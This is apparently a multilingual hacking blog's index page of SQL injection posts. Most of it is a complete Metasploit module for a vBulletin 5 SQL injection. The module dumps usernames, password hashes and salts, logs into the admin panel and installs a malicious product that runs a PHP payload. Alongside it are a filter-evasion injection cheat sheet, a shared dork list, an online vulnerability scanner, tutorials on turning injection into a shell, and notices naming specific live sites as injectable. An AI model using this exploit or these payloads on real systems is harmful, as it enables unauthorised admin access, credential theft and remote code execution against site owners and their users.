Kloxo dính lỗi bảo mật SQL injection và cách khắc phục

Với lỗi bảo mật này, Hacker có thể truy cập trái phép vào Kloxo cPanel dưới quyền Admin. Vì vấn đề khá nguy hiểm nên mình ko muốn post tool và phân tích bug mà sẽ post cách khắc phục thôi nhé. Bác nào hiểu thì tự tìm hiểu tiếp, nếu biết rồi cũng ko nên public ra làm gì vì hiện giờ rất nhiều hệ thống đang sử dụng Kloxo.

* Hiểm họa: Hacker sẽ có thể đăng nhập dưới quyền Admin Kloxo và... sẽ ko làm gì hết?

Lỗi SQL Injection này giúp attacker login dưới quyền admin

Thôi kệ nó, giờ đi khắc phục nhé!

READ MORE »

vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection',
      'Description'    => %q{
        This module exploits a SQL injection vulnerability found in vBulletin 5 that has
        been used in the wild since March 2013. This module uses the sqli to extract the
        web application's usernames and hashes. With the retrieved information tries to
        log into the admin control panel in order to deploy the PHP payload. This module
        has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu
        Linux distribution.
      },
      'Author'         =>
        [
          'Orestis Kourides', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-3522' ],
          [ 'OSVDB', '92031' ],
          [ 'EDB', '24882' ],
          [ 'BID', '58754' ],
          [ 'URL', 'http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt' ]
        ],
      'Privileged'     => false, # web server context
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 10000 # Just value big enough to fit any php payload
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'vBulletin 5.0.0 Beta 11-28', { }]],
      'DisclosureDate' => 'Mar 25 2013',
      'DefaultTarget'  => 0))
 
    register_options(
      [
        OptString.new("TARGETURI", [true, 'The path to vBulletin', '/']),
        OptInt.new("NODE", [false, 'Valid Node ID']),
        OptInt.new("MINNODE", [true, 'Valid Node ID', 1]),
        OptInt.new("MAXNODE", [true, 'Valid Node ID', 100])
      ], self.class)
  end
 
  def exists_node?(id)
    mark = rand_text_alpha(8 + rand(5))
    result = do_sqli(id, "select '#{mark}'")
 
    if result and result =~ /#{mark}/
      return true
    end
 
    return false
  end
 
  def brute_force_node
    min = datastore["MINNODE"]
    max = datastore["MAXNODE"]
 
    if min > max
      print_error("#{peer} - MINNODE can't be major than MAXNODE")
      return nil
    end
 
    for node_id in min..max
      if exists_node?(node_id)
        return node_id
      end
    end
 
    return nil
  end
 
  def get_node
    if datastore['NODE'].nil? or datastore['NODE'] <= 0
      print_status("#{peer} - Brute forcing to find a valid node id...")
      return brute_force_node
    end
 
    print_status("#{peer} - Checking node id #{datastore['NODE']}...")
    if exists_node?(datastore['NODE'])
      return datastore['NODE']
    else
      return nil
    end
  end
 
  def do_sqli(node, query)
    mark = Rex::Text.rand_text_alpha(5 + rand(3))
    random_and = Rex::Text.rand_text_numeric(4)
    injection = ") and(select 1 from(select count(*),concat((select (select concat('#{mark}',cast((#{query}) as char),'#{mark}')) "
    injection << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) "
    injection << "AND (#{random_and}=#{random_and}"
 
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, "index.php", "ajax", "api", "reputation", "vote"),
      'vars_post' =>
        {
          'nodeid'  => "#{node}#{injection}",
        }
      })
 
    unless res and res.code == 200 and res.body.to_s =~ /Database error in vBulletin/
      return nil
    end
 
    data = ""
 
    if res.body.to_s =~ /#{mark}(.*)#{mark}/
      data = $1
    end
 
    return data
  end
 
  def get_user_data(node_id, user_id)
    user = do_sqli(node_id, "select username from user limit #{user_id},#{user_id+1}")
    pass = do_sqli(node_id, "select password from user limit #{user_id},#{user_id+1}")
    salt = do_sqli(node_id, "select salt from user limit #{user_id},#{user_id+1}")
 
    return [user, pass, salt]
  end
 
  def do_login(user, hash)
    res = send_request_cgi({
      'uri'           => normalize_uri(target_uri.path, "login.php"),
      'method'        => 'POST',
      'encode_params' => false,
      'vars_get'      => {
        'do' => 'login'
      },
      'vars_post'     => {
        'url'                      => '%2Fadmincp%2F',
        'securitytoken'            => 'guest',
        'logintype'                => 'cplogin',
        'do'                       => 'login',
        'vb_login_md5password'     => hash,
        'vb_login_md5password_utf' => hash,
        'vb_login_username'        => user,
        'vb_login_password'        => '',
        'cssprefs'                 => ''
      }
    })
 
    if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and res.headers['Set-Cookie']
      session = res.get_cookies
    else
      return nil
    end
 
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, "admincp", "/"),
      'cookie' => session
    })
 
    if res and res.code == 200 and res.body and res.body.to_s =~ /<title>Forums Admin Control Panel<\/title>/
      return session
    else
      return nil
    end
 
  end
 
  def get_token(response)
    token_info = {
      :session_hash => "",
      :security_token => "",
      :admin_hash => ""
    }
 
    if response =~ /var SESSIONHASH = "([0-9a-f]+)";/
      token_info[:session_hash] = $1
    end
 
    if response =~ /var ADMINHASH = "([0-9a-f]+)";/
      token_info[:admin_hash] = $1
    end
 
    if response =~ /var SECURITYTOKEN = "([0-9a-f\-]+)";/
      token_info[:security_token] = $1
    end
 
    return token_info
  end
 
  def get_install_token
    res = send_request_cgi({
      "uri"      => normalize_uri(target_uri.path, "admincp", "product.php"),
      "vars_get" => {
        "do" => "productadd"
      },
      "cookie"   => @session
    })
 
    unless res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/
      return nil
    end
 
 
    return get_token(res.body.to_s)
  end
 
  def install_product(token_info)
 
    xml_product = <<-EOF
<?xml version="1.0" encoding="ISO-8859-1"?>
 
<product productid="#{@product_id}" active="0">
  <title>#{@product_id}</title>
  <description>#{@product_id}</description>
  <version>1.0</version>
  <url>http://#{@product_id}.loc</url>
  <versioncheckurl>http://#{@product_id}.loc/version.xml</versioncheckurl>
  <dependencies>
    <dependency dependencytype="vbulletin" minversion="" maxversion="" />
  </dependencies>
  <codes>
    <code version="*">
      <installcode>
        <![CDATA[
        #{payload.encoded}
        ]]>
      </installcode>
      <uninstallcode />
    </code>
  </codes>
  <templates>
  </templates>
  <stylevardfns>
  </stylevardfns>
  <stylevars>
  </stylevars>
  <hooks>
  </hooks>
  <phrases>
  </phrases>
  <options>
  </options>
  <helptopics>
  </helptopics>
  <cronentries>
  </cronentries>
  <faqentries>
  </faqentries>
  <widgets>
  </widgets>
</product>
    EOF
 
    post_data = Rex::MIME::Message.new
    post_data.add_part(token_info[:session_hash], nil, nil, "form-data; name=\"s\"")
    post_data.add_part("productimport", nil, nil, "form-data; name=\"do\"")
    post_data.add_part(token_info[:admin_hash], nil, nil, "form-data; name=\"adminhash\"")
    post_data.add_part(token_info[:security_token], nil, nil, "form-data; name=\"securitytoken\"")
    post_data.add_part(xml_product, "text/xml", nil, "form-data; name=\"productfile\"; filename=\"product_juan2.xml\"")
    post_data.add_part("", nil, nil, "form-data; name=\"serverfile\"")
    post_data.add_part("1", nil, nil, "form-data; name=\"allowoverwrite\"")
    post_data.add_part("999999999", nil, nil, "form-data; name=\"MAX_FILE_SIZE\"")
 
    # Work around an incompatible MIME implementation
    data = post_data.to_s
    data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
 
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.path, "admincp", "product.php"),
      'method'   => "POST",
      'ctype'    => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie'   => @session,
      'vars_get' => {
        "do" => "productimport"
      },
      'data'     => data
    })
 
    if res and res.code == 200 and res.body and res.body.to_s =~ /Product #{@product_id} Imported/
      return true
    elsif res
      fail_with(Failure::Unknown, "#{peer} - Error when trying to install the product.")
    else
      return false
    end
 
  end
 
  def get_delete_token
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.path, "admincp", "product.php"),
      'cookie'   => @session,
      'vars_get' => {
        "do" => "productdelete",
        "productid" => @product_id,
        "s" => @session_hash
      }
    })
 
    if res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/
      return get_token(res.body.to_s)
    end
 
    return nil
  end
 
  def delete_product(token_info)
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.path, "admincp", "product.php"),
      'method'   => "POST",
      'cookie'   => @session,
      'vars_get' => {
        "do" => "productkill"
      },
      'vars_post' => {
        "s"             => token_info[:session_hash],
        "do"            => "productkill",
        "adminhash"     => token_info[:admin_hash],
        "securitytoken" => token_info[:security_token],
        "productid"     => @product_id
      }
    })
 
    if res and res.code == 200 and res.body.to_s =~ /Product #{@product_id} Uninstalled/
      return true
    end
 
    return false
  end
 
  def check
    node_id = get_node
 
    unless node_id.nil?
      return Msf::Exploit::CheckCode::Vulnerable
    end
 
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "index.php")
    })
 
    if res and res.code == 200 and res.body.to_s =~ /"simpleversion": "v=5/
      return Msf::Exploit::CheckCode::Detected
    end
 
    return Msf::Exploit::CheckCode::Unknown
  end
 
  def on_new_session(session)
    print_status("#{peer} - Getting the uninstall token info...")
    delete_token = get_delete_token
    if delete_token.nil?
      print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
      return
    end
 
    print_status("#{peer} - Deleting the product #{@product_id}...")
    if delete_product(delete_token)
      print_good("#{peer} - Product #{@product_id} deleted")
    else
      print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...")
    end
  end
 
  def exploit
    print_status("#{peer} - Checking for a valid node id...")
    node_id = get_node
    if node_id.nil?
      print_error("#{peer} - node id not found")
      return
    end
 
    print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...")
    data = do_sqli(node_id, "select count(*) from user")
    if data.empty?
      print_error("#{peer} - Error exploiting sqli")
      return
    end
    count_users = data.to_i
    users = []
    print_good("#{peer} - #{count_users} users found")
 
    for i in 0..count_users - 1
      user = get_user_data(node_id, i)
      report_auth_info({
        :host => rhost,
        :port => rport,
        :user => user[0],
        :pass => user[1],
        :type => "hash",
        :sname => (ssl ? "https" : "http"),
        :proof => "salt: #{user[2]}" # Using proof to store the hash salt
      })
      users << user
    end
 
    @session = nil
    users.each do |user|
      print_status("#{peer} - Trying to log into vBulletin admin control panel as #{user[0]}...")
      @session = do_login(user[0], user[1])
      unless @session.blank?
        print_good("#{peer} - Logged in successfully as #{user[0]}")
        break
      end
    end
 
    if @session.blank?
      fail_with(Failure::NoAccess, "#{peer} - Failed to log into the vBulletin admin control panel")
    end
 
    print_status("#{peer} - Getting the install product security token...")
    install_token = get_install_token
    if install_token.nil?
      fail_with(Failure::Unknown, "#{peer} - Failed to get the install token")
    end
 
    @session_hash = install_token[:session_hash]
    @product_id = rand_text_alpha_lower(5 + rand(8))
    print_status("#{peer} - Installing the malicious product #{@product_id}...")
    if install_product(install_token)
      print_good("#{peer} - Product successfully installed... payload should be executed...")
    else
      # Two situations trigger this path:
      # 1) Upload failed but there wasn't answer from the server. I don't think it's going to happen often.
      # 2) New session, for exemple when using php/meterpreter/reverse_tcp, the common situation.
      # Because of that fail_with isn't used here.
      return
    end
 
    print_status("#{peer} - Getting the uninstall token info...")
    delete_token = get_delete_token
    if delete_token.nil?
      print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
      return
    end
 
    print_status("#{peer} - Deleting the product #{@product_id}...")
    if delete_product(delete_token)
      print_good("#{peer} - Product #{@product_id} deleted")
    else
      print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...")
    end
 
  end
 
 
end

Nguồn: http://www.exploit-db.com/exploits/30212/

READ MORE »

Web Hosting software WHMCS vulnerable to SQL Injection; emergency security update released

WHMCS, a popular client management, billing and support application for Web hosting providers, released an emergency security update for the 5.2 and 5.1 minor releases, to patch a critical vulnerability that was publicly disclosed.

READ MORE »

Oracle SQL Injection Tutorial

Oracle SQL Injection Tutorial.
Hello and welcome to a Oracle SQL injection tutorial. First you need to know that injecting into to Oracle databases is not much different then injecting into others. The only differences are the syntax and different filenames etc... Ok, if you know a site the is vulnerable to some sort of SQLi but, you don't know what database it is, try the following code to check for a Oracle DB.

READ MORE »

BIGGEST SQL Injection Dorks List ~20K+ Dorks

Here is the treasure, the biggest SQL dork list ever :)  Hope it helps some newbies out there:

Get it here: http://pastebin.com/2QqQh9jg

Master Sql Cheet With Waf sheets

SQLi filter evasion cheat sheet (MySQL)
Basic filter

Comments
'Or 1 = 1 #
'Or 1 = 1 -
'Or 1 = 1 / * (MySQL <5.1)
'Or 1 = 1;
'Or 1 = 1 union select 1.2 as `
'Or # newline
1 = '1
'Or--newline
1 = '1
'/ *! 50000or * / 1 = '1
'/ *! Hay * / 1 = '1

Prefixes
+ - ~!
'Or - +2 = -!!! '2

Operators
^, =,! =,%, /, *, &, &&, | |, | |,, >>, <=, <=,,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, Least, Greatest , CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL

READ MORE »

Tutorial: Fix bug SQL Injection Music Gift for vBB

Vào AdminCP > Plugins & Products > Plugin Manager, sau đó kéo xuống và tìm đến Plugin của mod Music Gift.

Sửa plugin có hook là ajax_start, thêm vào đoạn đầu phần Plugin PHP Code hàm sau (hàm này có tác dụng lọc input của câu lệnh SQL):

function anti_sql($sql) {
$sql = str_replace(sql_regcase("/(from|select|insert|delete|where|drop table|show tables|#|*|--|\)/"),"",$sql);
return trim(strip_tags(addslashes($sql))); #strtolower()
}

READ MORE »

vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection

# Exploit Title: vBulletin 5 Beta XX SQLi 0day

# Google Dork: "Powered by vBulletin™ Version 5.0.0 Beta"

# Date: 24/03/2013

# Exploit Author: Orestis Kourides

# Vendor Homepage: www.vbulletin.com

# Software Link:

# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28

# Tested on: Linux

# CVE : None

READ MORE »

[SQLMAP] SQL Injection utilizando método POST

En esta entrada breve y simple, se detallaran los pasos que realizaremos cuando necesitemos explotar una vulnerabilidad de Sql Injection, que mayormente se encuentran en algunos servidores basados en SQL Server y Oracle. Estas vulnerabilidades son típicas en los LOGIN'S Administrativos, ya que como debemos de saber,  que cuando ingresamos el usuario y password estos datos se envían a través del método POST, por lo tanto puede existir la posibilidad de que al ingresar datos falsos o algunos bypasses, esta nos pueda mostrar algún error que nos permita identificar la vulnerabilidad, por tanto se puede explotar automatizadamente utilizando SQLMAP ejecutando comandos para enviar la petición en POST y no en GET como se "acostumbra".

READ MORE »

REAL SQL - V0.3 (SQLi Finder)

Here comes a post after a long holidays from blogging due to my exams. This is about one of my favs SQli scanner. Its called Real SQLi. Just found this so thought of posting here.
What is does is search through Google, using Google Dorks and tries each website for an SQL Injection Vulnerability and if it is successful it will return the vulnerable link to you!
This is the main GUI of the application and in later screenshots I will show you it's features.

READ MORE »

Multiple ways to do POST Injection

SQLi vBB + Upload Shell via phpMyAdmin + Remote Desktop

SQL Injection  vBB + Upload Shell via phpMyAdmin + Remote Desktop

Download Tutorial:
Click here to download!

Password: junookyo

How to check Thuexesaigon.net?

SQL Injection to Shell with SQLMap

Hace algunos días auditando un Servidor Web (universidad) basada en Apache 1.3.26, PHP 4.2.1 a un cliente, me tope con la típica vulnerabilidad de Inyección de Código Sql, la cual permite fácilmente obtener toda la base de datos del servidor, entonces de inmediato empece a inyectar manualmente pero para mi suerte!!! ninguna de las inyecciones y bypasses dio resultado, entonces me pregunte ¿Por que? si es una vulnerabilidad peligrosa y fácilmente explotable, pero luego analizando nuevamente di con el resultado que era un simple FP (falso positivo).

READ MORE »

[Warning] Dmart.vn - SQL Injection

• Exploit: SQL Injection
• Description: Query from TopX.
• Đánh giá: Nghiêm trọng.
• Tình trạng: (Đang liên hệ Quản trị viên).

Online SQLi Scanner

Online SQLi scanner is the best thing you need when you are out of your private hacking room. So here is one more Online SQLi scanner i found today so sharing with you people. 

Its right here - http://www.poomplacedorm.com/hyde.php

[Warning] Dalathoiquan.net

• Exploit: SQL Injection
• Đánh giá: Nghiêm trọng.
• Khai thác: Query lấy thông tin User.
• Tình trạng: (Đã liên hệ Quản trị viên).

SQL Injection - Labs series

Link to part 1: http://www.securitytube.net/video/4171
Link to part 2: http://www.securitytube.net/video/4200
Link to part 3: http://www.securitytube.net/video/4208
Link to part 4: http://www.securitytube.net/video/4210
Link to part 5: http://www.securitytube.net/video/4269
Link to part 6: http://www.securitytube.net/video/4283
Link to part 7: http://www.securitytube.net/video/4303
Link to part 8: http://www.securitytube.net/video/4326
Link to part 9: http://www.securitytube.net/video/4399
Link to part 10: http://www.securitytube.net/video/4532
Link to part 11: http://www.securitytube.net/video/4650
Link to part 12: http://www.securitytube.net/video/4667
Link to part 13: http://www.securitytube.net/video/4672
Link to part 14: http://www.securitytube.net/video/4672
Link to part 15: http://www.securitytube.net/video/5104
Link to part 16: http://www.securitytube.net/video/5562
Link to part 17: http://www.securitytube.net/video/6035
Link to part 18: http://www.securitytube.net/video/6176

READ MORE »

WordPress - PICA Photo Gallery Automatic SQL Injection (perl)

# Exploit title: WordPress - PICA Photo Gallery Automatic SQL Injection (perl)
# Author: D35m0nd142
# Software Link: http://www.apptha.co...A-Photo-Gallery
# Google Dork: intext:"Powered by Apptha." inurl:gallery
# Thanks to Da0ne

READ MORE »

SQL Injection - Double Query - Tutorial

Hey guys,

Okay, so I will be showing you how to apply a Double Query Sql Injection...

So what you have to know is that the stuff you're going to read about here does always works 100 % and am telling you that because I have a 10 years experience hacker so suck it...
READ MORE »